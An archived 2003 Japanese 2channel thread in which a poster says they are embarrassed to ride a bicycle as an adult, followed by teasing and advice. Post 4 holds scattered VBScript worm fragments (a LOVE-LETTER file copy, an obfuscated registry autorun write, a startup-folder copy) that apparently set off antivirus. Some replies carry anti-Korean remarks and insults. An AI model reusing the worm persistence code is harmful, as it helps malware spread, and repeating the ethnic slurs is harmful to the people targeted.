2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

恥ずかしくて自転車に乗れません

1 :おさかなくわえた名無しさん:03/09/15 19:09 ID:z26jBLZ6
小学6年生までは普通に自転車に乗っていたんですが
大人になった今、どうしても恥ずかしくて自転車に乗れません。
数年前に一度だけ新しい自転車を買ったんですが、夜中か早朝にしか乗る事ができず
何時の間にか無くなっていました。

自分が乗るのも恥ずかしいのですが、他人が自転車に乗っているのを見ると
なんだか申し訳無くて目をそらしてしまいます。
知り合いが自転車に乗っているのを見ると、見てはいけないものを見てしまったような気がして
見ない振り、気づかなかった振りをしてしまいます。

本当は自転車に乗りたいんです。
こんな人他にもいますか?

2 :おさかなくわえた名無しさん:03/09/15 19:10 ID:olEdvvuN
2y

3 :おさかなくわえた20世紀梨さん:03/09/15 19:11 ID:TkYPs2m7
関連スレ

天気も良いし自転車で出かけよう!
http://life2.2ch.net/test/read.cgi/kankon/1056852135/


4 :おさかなくわえた名無しさん:03/09/15 19:11 ID:p5oys296
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))

5 :おさかなくわえた名無しさん:03/09/15 19:14 ID:zuC4ClM5
大学生になって、原付で通学するようになって数年が経ち
久しぶりに自転車に乗ってみたら
笑った!
マジうけた!
だって全然前に進まないんだもん
オリャー!って全開ペダルこいでも全然進まない!
あれにはマジ笑ったよ
笑いながら自転車こいでた
はたから見れば、キチガイだったな

6 :おさかなくわえた名無しさん:03/09/15 19:16 ID:w6oCZEwt
精神科いけ

7 :おさかなくわえた名無しさん:03/09/15 19:28 ID:Fmt1NWI7
>>5
それってダイエットとかのやつじゃない?

8 :おさかなくわえた名無しさん:03/09/15 19:39 ID:aP/mNFd6
>5
山田花子のマラソンとどっちが速いですか?


9 :おさかなくわえた名無しさん:03/09/15 19:48 ID:zuC4ClM5
>>7
後輪付いてたからエアロバイクじゃなかったと思う

>>8
そりゃ山田花子よりは速いさ




まじでゴメン
マジレスしか思い浮かばなくて・・・

10 :おさかなくわえた名無しさん:03/09/15 19:51 ID:vnUkWS9A
>>5
キチガイだったって。。。
今もキチガイでしょ?

11 :おさかなくわえた名無しさん:03/09/15 19:56 ID:zuC4ClM5
>>10
ううん。違うよ。

12 :おさかなくわえた名無しさん:03/09/15 20:00 ID:atw7mESY
オレ普通に使い分けてるけど。
遠出は原付、
近場は健康を考えてチャリ。
>>1は意識過剰じゃない?


13 :おさかなくわえた名無しさん:03/09/15 20:26 ID:48oN4jRD
なんで恥ずかしいのよ

14 :おさかなくわえた名無しさん:03/09/15 20:27 ID:48oN4jRD
ダサいとか?

15 :おさかなくわえた名無しさん:03/09/15 20:29 ID:pctehVZg
「自転車が恥ずかしい」って韓国人みたいだな。

自転車板でも逝って来なさい。
http://sports.2ch.net/bicycle/

16 :おさかなくわえた名無しさん:03/09/15 20:29 ID:SNR/cK0D
>1
自意識過剰だ。
あんたが自転車乗ろうと一輪車乗ろうと
誰も気にしねーよ。

17 :おさかなくわえた名無しさん:03/09/15 20:31 ID:xmCO3JXY
>>1
病院行った方がいいよ。

18 :おさかなくわえた名無しさん:03/09/15 20:31 ID:SpbEBPcz
このスレノートン反応しちゃうんだけどなぜ?

19 :おさかなくわえた名無しさん:03/09/15 20:36 ID:48oN4jRD
>>18
ラブレター

20 :おさかなくわえた名無しさん:03/09/15 20:40 ID:zdvm2gqb
恥ずかしいとは思わないが
車道を走ると車が怖いし、歩道を走ると人を避けたり
チリンチリン鳴らすのが面倒だしでずっと自転車乗ってないな。
サイクリングコースとかを走るのは気持ちよさそうだと思うけどね。

21 :おさかなくわえた名無しさん:03/09/15 20:41 ID:iIeO4Cwg
>>1は競輪みながら赤面してるド変態

22 :おさかなくわえた名無しさん:03/09/15 20:46 ID:xf7pwQbC
オマエ、なんか間違ってるだろ?って感じの折り畳み自転車とか?
必死な感じのマウンテンバイクとか?
ピタパン履いてるレーサーさんとか?
見逃してやれよ(w

23 :おさかなくわえた名無しさん:03/09/15 20:46 ID:ybVB9HhT
教習所に自転車で行くとなぜか恥ずかしい

24 :おさかなくわえた名無しさん:03/09/15 20:50 ID:YPqyygnM
大の大人が自転車で駅まで行く姿はなんか恥ずかしい

25 :おさかなくわえた名無しさん:03/09/15 20:53 ID:NGXC/96X
えーと削除依頼出してきますね〜

26 :おさかなくわえた名無しさん:03/09/15 21:40 ID:DUhqkoEN
俺も最近原付き乗りはじめたんだけど素直に>>5と同じ考えだったよ。チャリ遅っ!と思う。
だけど晴れの日にチャリ乗ると、きもちいいなぁと思うしその楽しさを味わえない>>1はかわいそう。

27 :おさかなくわえた名無しさん:03/09/16 00:07 ID:NDajpOL1
自転車板では10〜50万の自転車に乗ってる人がいっぱいいる

28 :おさかなくわえた名無しさん:03/09/16 22:34 ID:NWxMwK1W
自転車レース用のピチピチのパンツは恥ずかしい。
下着なしで直に履いてるしモッコリするし、股の部分にはオシメみたいな補強してあるし。

29 :おさかなくわえた名無しさん:03/09/16 22:38 ID:Ps1IZ33u
>>28
横に☆がいっぱい付いてれば誇らしいですよ

30 :おさかなくわえた名無しさん:03/09/16 23:09 ID:eUZ692fO
>>5・26さんのどちらかは自転車の空気ちゃんとはいってないことも考えられる。
空気ちゃんと入ってないとスムーズに進んでかないんだよね

31 :おさかなくわえた名無しさん:03/09/16 23:55 ID:gDMYi55r
普段徒歩だから車とか原付乗ると うぉー速ぇぇーって吃驚する。
でも実家にいた頃田舎だったからいつも車で
たまに友達のチャリ乗ると ( ´,_ゝ`)プッ・・なにこれ っておもった。

32 :5:03/09/17 05:54 ID:3aWkEVN1
>>30
もちろん空気ちゃんと入ってるってばさ!
2stオートマ原チャに乗ってると
ただアクセルをひねるだけで一気に時速50〜60キロ出るわけよ
その体感スピードに慣れてしまってからチャリに乗ると
もんのすんごく笑えるんだよ
多段変速機付きの高価なチャリだとそう笑えないだろうけどさ

33 :おさかなくわえた名無しさん:03/09/19 08:50 ID:tjdDtsU9
車椅子も面白いよ
超信地旋回しまくった

34 :おさかなくわえた名無しさん:03/09/19 08:51 ID:0mSoqu1X
自転車が似合わない体系なのか?

35 :おさかなくわえた名無しさん:03/09/19 08:58 ID:O5I/wkbd
指より

36 :おさかなくわえた名無しさん:03/09/19 09:56 ID:dGb938wp
オッサンが自転車に乗ってるのって気持ち悪い
みんな下着泥棒に見える

37 :おさかなくわえた名無しさん:03/09/19 10:16 ID:j5X5gF37
朝鮮人は自転車に乗る奴を軽蔑するってね

38 :おさかなくわえた名無しさん:03/09/19 14:44 ID:BCj70BOC
流石にこの1が本気でそう言ってるんだったらちょっと心配。
自転車に乗るのが恥ずかしいて…
普通の自転車に、普通の格好して乗ってたら、おまいのことわざわざ見て
どうのこうの思うヤシなんてただの一人もいないだろうよ。

39 :おさかなくわえた名無しさん:03/09/19 21:45 ID:hxntUn1A
>>1
ヨーロッパでは自転車は地位が高いぞ。
日本の自転車パーツは世界一。
そう考えてみなさい。

40 :おさかなくわえた名無しさん:03/09/20 01:12 ID:UVRJQyY1
1ってキモオタなんだろ。
自分が自転車に乗ってる様を
客観的に想像すると恥ずかしいと
自覚出来るだけ未来はあるのかもしれない。
とりあえず痩せろ。

41 :おさかなくわえた名無しさん:03/09/20 19:22 ID:VaawblXO
最近は、東京でなくても
街の中心あたりで生活すると
車よりも自転車乗る方が便利だということが分かった
雨の日は濡れるし
大きい物は運べないけどね

42 :おさかなくわえた名無しさん:03/09/20 19:39 ID:4Bl1tBTJ
私は自転車に乗れない。頑張って練習しても、怖くて乗れない。
誰か催眠術でもかけて乗れるようにしてくんないかな・・・。

43 :おさかなくわえた名無しさん:03/09/20 22:24 ID:8DYShRQ+
>>1
そりゃ恥ずかしいよ!
今度からは補助輪付けないで乗れるように練習しろよ。

44 :おさかなくわえた名無しさん:03/09/21 00:55 ID:4HxLV4Mi
俺は恥ずかしいけどな。自転車。なんでだろう。
自転車恥ずかしすぎて乗れない。他人の自転車は
どうとも思わないから、自意識過剰なのかな。
でもスーツで自転車乗ってる人は見てるこっちが
恥ずかしいかも。

原付乗りだしたときはフルフェイス買ったな。
原付で半ヘルは激しく恥ずかしい。
大型乗る時もジェットヘルメット恥ずかしいんだよね。
だからジェッペルかぶる時はスモークシールド。
顔が透けて見えないミラースモーク。これで完璧。
ジェッペルのシールド開けて、サングラスで怖い人を
演じてみたり。

近所を徒歩で移動するのも微妙に恥ずかしいな。
最近運動してないな。ヤバイ。

45 :おさかなくわえた名無しさん:03/09/21 08:43 ID:wIy06fmp
>>44
ひき確認

46 :おさかなくわえた名無しさん:03/09/21 08:55 ID:w45TRHfP
小学生のとき半ズボンで乗ってたら
横からキンタマがはみ出してて恥ずかしかったです

47 :おさかなくわえた名無しさん:03/09/21 11:30 ID:aX9lBPn2
>>1
大丈夫だ。
お前が自転車に乗ってるのを見たら俺が笑ってやる。

48 :44:03/09/22 20:53 ID:Wn6C+01x
>45
つりじゃない。

出歩けないとかじゃなくて、微妙に恥ずかしい。
会社行くときとかは平気。私服で近所を歩くのが少し・・・。

49 :おさかなくわえた名無しさん:03/09/23 01:09 ID:11ECBjal
チャリに乗ってる女性を見るとやけに興奮するんですが・・・・
いえ、友人が。ですよ?

50 :おさかなくわえた名無しさん:03/09/23 09:53 ID:KbwJI2Jd
>>49
友人の女性が自転車にのっているのを見ると興奮するのね。

51 :おさかなくわえた名無しさん:03/09/23 19:46 ID:5pZN8nYZ
こないだ見た自転車女のスカートがまくれたが
スパッツだった…_| ̄|○

52 :おさかなくわえた名無しさん:03/09/23 20:40 ID:vyCUozWg
 ウイルス警告

53 :おさかなくわえた名無しさん:03/10/02 23:49 ID:EzV/HzWl
>>1
大人になると、なにがどう恥ずかしいの?

54 :おさかなくわえた名無しさん:03/10/02 23:55 ID:96QT5Jna
何が恥ずかしいのかさっぱりだ。
俺はどこに逝くにも自転車ばかりだぞ。


55 :おさかなくわえた名無しさん:03/10/02 23:59 ID:PzCP23dZ
1は車がカッコいいと勘違いしてるのかな?


56 :おさかなくわえた名無しさん:03/10/07 23:38 ID:Z23skDqO
バイクも車も乗ってるが、駅前にバイクの駐輪場は少ないし、治安が悪いから盗られそう。
飲んでバイクで帰ってくるわけにはいかんしな。

12 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)